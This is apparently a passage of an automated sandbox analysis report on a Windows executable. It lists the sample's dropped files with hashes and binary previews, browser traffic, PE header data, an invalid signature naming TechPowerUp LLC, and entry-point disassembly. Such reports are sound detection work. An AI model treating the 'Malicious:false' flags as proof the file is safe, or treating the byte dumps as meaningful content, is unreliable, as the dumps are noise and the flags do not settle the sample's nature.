                                                                                                                                                                                                                                                                                  SHA-512:61E4A6BFB253D4FCF21781324C6DD7B2DFF0750075BFE4CCAFFFF07A4D2FA552016DFB343BB835BFC7E7D6FD80B2B35B9519F2D6958885502758138BAB764E9C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..({.....65."...f....k%. +......v.Y.H2....A;U...'.s....3..R_H......QG...&XKw.,.f.MB....6.&tI.G*...J..V.P*... ..]....R.l.N...r.+da..h...d.*..^.t...?K....cR....z...h0...8.sEt...i.h|.c......F..LA.Y9.T.]_..!u...[e.#(.pN.t.0z..[U....N......K7.<..X..%..H..*w.C.E."...|....3...'..2.wi....?i..\(..8F. .s.T..#6...B.Hq..^..&XSgE.w.g....A0.<..w@.....M......r.M{......KP.V]...?......Qh...!....1..z .".*$J..xCB^.T..7.....,....g^.tXs.f...gz%..........5o.."x..2.....Q.g.`=..1..A.. .....L.B.....H.....q.B.<.o."u.ud.7.....y\.....d.Eil.".,.cw..m...Ax!.]R...I..}...<.L*...tj...._N.(..p...+v..3.....O..'V..).......L9M....sY...._..@..|.&UC.!.J..*Fp..).Nc.......\.......O.Ge.t.x...};.U.x.|.R...._.3....2,,+..~..)d.h..?....b....@..5....3....x.b.W{.wB.......i.g..N./..Aq.y....k.9w.g.yx.l2.Y;h..`J..x.XT....80.F.......!.....?90.$.....[.....+'{W.D@.]."[.r.j_...BW.f/.re.*.hpe......U.....V4].X_.=..r.S.Du]Ak.a....@...AAj.B...}.|:.`..-H=.......|.q.tP..h.....g.8b}z4.G8^.<N...
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):55296
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.654459170489211
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:XaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVml:XtNPnj0nEoXnml
                                                                                                                                                                                                                                                                                  MD5:35469FF6842A57BD9788DB58A1E1C0CC
                                                                                                                                                                                                                                                                                  SHA1:47B76F8AE04AEFF8CDE18E15A6AB9D072214A54A
                                                                                                                                                                                                                                                                                  SHA-256:7006A277A8B2AB82AE4409DF94E227083287B7678B9FFE79E2E19D534F1335EC
                                                                                                                                                                                                                                                                                  SHA-512:3B97531E8D41C069DD9A8A6F3FE0FBC498FACBB6DF823525A726499CF5A4EA40879B7D02138C6D020520DF2D59C28EFC2F51470BF9AAC9F00B6F40101FE51AD0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.....~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x.......f.~....h....E..GP..\....}..
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.555933383144663
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:65fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubT:ufhnueoMmOqDoioO5bLezW9FfTun
                                                                                                                                                                                                                                                                                  MD5:04DF53FD74B69C92DBA8CD83EAFA1180
                                                                                                                                                                                                                                                                                  SHA1:275765D9C7E3300C0B7579AE3DE32F658E12945C
                                                                                                                                                                                                                                                                                  SHA-256:DB246122E92D7C13AE1050C65C1E1F722F4E98375C9875D719F775CFE1478EE9
                                                                                                                                                                                                                                                                                  SHA-512:44DFA1CCF0C3B054DAC3FADBA5A87C7C56F318C74DFF83810310E349B80029F19A08133C502DD7B65E543B882E567AC19DE54F8A520FF073774894F6F8320EF5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..@...Pjr...........9\$Dt......P....D$...@.Ph........3......B..\$0j.....D$4.\$<PW.u..D$L..........x .E....@....f.x..t...@...Pjr.p....L$0.&q......P....D$....f..A.......t$@.L$d.=...D$...P.D$$P.D$hP.u.S.;......L$`.....G....tp....Rt[...t9...t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):53248
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.721434698149147
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:4Mf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdno:Dh+I+FrbCyI7P4Cxi8q0vQEcmFdno
                                                                                                                                                                                                                                                                                  MD5:7847E23CCE3770257DD905024CDC5020
                                                                                                                                                                                                                                                                                  SHA1:2D2070CB134CCDE38544814A1E1E35A08AB95EA6
                                                                                                                                                                                                                                                                                  SHA-256:75F0206860B962D3636015D98C420EC5EBF4023CA7B75B747AEB388AAFE9049A
                                                                                                                                                                                                                                                                                  SHA-512:97F5B6924C23343F732AB470B8006EF2B25C92FADB3560FD56DB6E53B8DAF0C65CE66EB416BD03126C3B1AE6FA2CF66178A487C0EABAD24263A3DE7253C236B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.h..L....3..u.E..0....Y.u..E....8........?k.0.....M..D.(.t!W.....YP....I...u.........0.I.................u..E.............\.......u.M..1.....Y..U.....E..M..E..E.E.P.u..E.P.D.....]..U..QV.u..
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):95232
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.612003853136968
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:ZKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBR:ZKaj6iTcPAsAhxjgarB/5el3EYrDWD
                                                                                                                                                                                                                                                                                  MD5:D9EBAE5A1B2F513852F89FDC3D31672D
                                                                                                                                                                                                                                                                                  SHA1:DFA418E6FD3C5B16B685EA0E09CC159A5FF6ED14
                                                                                                                                                                                                                                                                                  SHA-256:B9A3C8E95D261CC9C6B28B58518554120AA2CFA09C2BE81C609C0F01B26B313D
                                                                                                                                                                                                                                                                                  SHA-512:D5A9226EA1152566872669C4072BEA6498C930E405DB45FB6B7B63CD7A807BE814C7A71E983851F5D7A66B131319A850DDB10E1D4661D4CACD3082CB5C1CAEAC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.........................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.................................(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41523
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.995572172924696
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:KQQtn0ggXOoA6vd4BnDiNdFDS0YV56wjvXNRsQEY4qGmScAh6SYN:KQQywQvT1TYV5LjvNyhqGXce67
                                                                                                                                                                                                                                                                                  MD5:6F1A940A0159306F679FF4D03524AE0B
                                                                                                                                                                                                                                                                                  SHA1:2B48523D0BF3828ABD8590E13A03B5946B3D442D
                                                                                                                                                                                                                                                                                  SHA-256:7E294DD8F93A9A7D79FB118070F548D1E8FDA62FA96AF973E1A950F150B0331E
                                                                                                                                                                                                                                                                                  SHA-512:4DDF0AFA24B981BAC3CA60CB52AF73E39BF7155972F49968C8FC85A17F561208D76158CD117948467176696A0BA87B9AC33658C5E7EF1EF3D4201139E959F932
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...._..*...b@}.+....G.Qb._.._A...Q....u.V.^..-y.R...bP{..1..c_%..%.wt.oCbD.z.2.r'.-......V...h..g9S...e..K.ozJ6.d........F<;I.<nv.r..-.W.*s"q.>A.`. ....]Q&[...B.......b(...... .7...{..,m1.%...I.%...&... .........&[.67*.+..&..@.LV......B.C..W..2.y...Ji.L1..DY.h..6..z.B..n..K.A..P....1+J%..~.)....Q.M4.s.$..\X6..O...,_...V.7..O../........~.$yV(-.@...^.6..../.A.q..L.mN...B....S.NO...j.....iN.8........`...}.a.4..#>.....-..j\3.E0...6~...N*...0.......T......c.c.5..H...@].Ax..P@...W=T.2(w_.......iRO'.wF......@L.)......T....Dp..z9.s......w .....^........o...*n.W.a.V.^o.=..G..q..2.g<5....C.... .......S...BM."..MzHK...v.Z*..H.........v?IT..f1.N.ts.....dIQ=.[..dWg.4OR;.h.x.P.i......Cj...@W.zg...L,...y.f25D...}M..5.]..NB!8.9..L*;..AT..z..?....)z.....Z....oA.WM.(..H.J......|.4..2. ...9...e..g..z...[..2]-a.N,@..;......3...I$..#.9..Z9...<..[X...'m....>.../.....WPe.@.._...=P........|`R...`..a.)...I(J.R......z. .......1B7..d.=..jy.q`&..4n..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3198)
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):3203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.830377803857918
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:jIlglikIN6666VPxM//IE+nOsms9cWO/KCG4KHQffffo:j5WN6666VZpJ6sqKC0
                                                                                                                                                                                                                                                                                  MD5:7967BA56CDED3C8F10B7012991BA94DF
                                                                                                                                                                                                                                                                                  SHA1:A5A853E2F64B0234F49BF22056AD711A4F525911
                                                                                                                                                                                                                                                                                  SHA-256:547A69554D9F4D3077E2DA90FDF908D38D95218B6BC909C770CE0FEEC0A1B9DF
                                                                                                                                                                                                                                                                                  SHA-512:A4509FBB9876628639A94145D1556625406679A5C92222D14555B527070B8E5349F1A6D14AC26994505214095731D4AC3B63E11BCDBC258F1A771F8E1197E6A9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["sonic the hedgehog 3 movie box office","walker buehler","winter weather advisory","ursid meteor shower","palworld update","party city closing stores","gladiator ii streaming","nfl mvp odds"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CgsvbS8wMTB3cTk2ahIZQW1lcmljYW4gYmFzZWJhbGwgcGl0Y2hlcjL3DGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUdCd01FQlFFQ0FQL0VBRFlRQUFJQkF3TUJCZ0lIQ1FFQUFBQUFBQUVDQXdBRUVRVVNJUVlpTVVGUmdaRUhFekpDWVhGeXNjRVdNMUtDa3FIQzBlRVUvOFFBR1FFQUF3RUJBUUFBQUFBQUFBQUFBQUFBQWdNRUFRQUYvOFF
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):132723
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.436647375682781
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:fTkJQ7O4N5dTm+syHEt4W3XdQ4Q6tuSr/nUW2i6o:fGQ7HTt/sHdQ4Q6tDfUW8o
                                                                                                                                                                                                                                                                                  MD5:6B3BE793756486DC499E58FF6327980B
                                                                                                                                                                                                                                                                                  SHA1:D9E8B26C18C7E003CF2A60374BEC7DCCBCA43E19
                                                                                                                                                                                                                                                                                  SHA-256:187EF3FB59922377ED6C92A8FBF26178B99B73A732F32B4A8E1D1056D736A1D4
                                                                                                                                                                                                                                                                                  SHA-512:5E0240770261EB321577F43A270A2E1FBD35E680589AD9E084E6E548C25770DAABB3B32502F5E1D2CABEDBE2F3D465BE9523BBC7C96798C1F489CE17DDB894E6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.96744840145825
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                  File name:9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File size:863'093 bytes
                                                                                                                                                                                                                                                                                  MD5:8eb4f92605e35c57a42b0917c221d65c
                                                                                                                                                                                                                                                                                  SHA1:0e64d77ef1b917b3afe512b49710250c71369175
                                                                                                                                                                                                                                                                                  SHA256:b57d78d93f74f7ae840ab03d3fda4f22a24ad35afcf9a53128cf82a92a67a085
                                                                                                                                                                                                                                                                                  SHA512:4cc5db426c8de3d7afdcfa26440d5bd9a885f5148e4307b8d04c5d56c96672d5c82ed9989bf346ce7aecea07d980735c46a930b885f824ba53738ac76dbb05bf
                                                                                                                                                                                                                                                                                  SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
                                                                                                                                                                                                                                                                                  TLSH:5F052346AFD8007ADEA10FBA33F0EAA34D757D512CB4D61B2396CE8D6CE56C14D6430A
                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                  Icon Hash:34b818e8ece81848
                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                                  • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                                  Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                                                                                                                                                  Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                                                                                                                                                  Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                                                                                                                                                  Serial:115BBE9E1C286827AF66E7A01390C206
                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                  call 00007F66986877ABh
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  push 0040A264h
                                                                                                                                                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                  push 0040A24Ch
                                                                                                                                                                                                                                                                                  push 00476AA0h
                                                                                                                                                                                                                                                                                  call 00007F669868748Dh
                                                                                                                                                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                  call 00007F669868747Bh
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                                                                                  jne 00007F6698684D7Ah
                                                                                                                                                                                                                                                                                  push 00000022h
                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  call 00007F6698687151h
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                  jmp 00007F6698684E03h
                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                  cmp ax, bx
                                                                                                                                                                                                                                                                                  jne 00007F6698684D7Ah
                                                                                                                                                                                                                                                                                  add esi, 02h
                                                                                                                                                                                                                                                                                  cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x52ba.rsrc
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xd06a50x24d0.ndata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
